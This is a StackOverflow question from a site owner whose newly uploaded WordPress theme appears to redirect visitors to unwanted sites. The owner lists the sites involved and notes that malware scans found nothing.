Source: (StackOverflow)
Good Day
I just uploaded a Wordpress theme onto my Website webserver. Now I tested this theme on my home server before with no problems.
Since it has been on the webserver (at a trusted hosting company), I get url redirects to malicious sites when I am browsing though my website. (I have never given any account details to anyone, account only a week old)
Here is my site: http://evolutionof4.co.za
The malicious sites it links to are: themeforest.net, carolini.net amongst others.
I have scanned all my files on the webserver for malware (with avast), I have also scanned my site with Sucuri Security, but it did not pick up anything.
I don't think it is malware on MY PC, since I got the same problem from another PC on my LAN...
Any help?
Thank you
Source: (StackOverflow)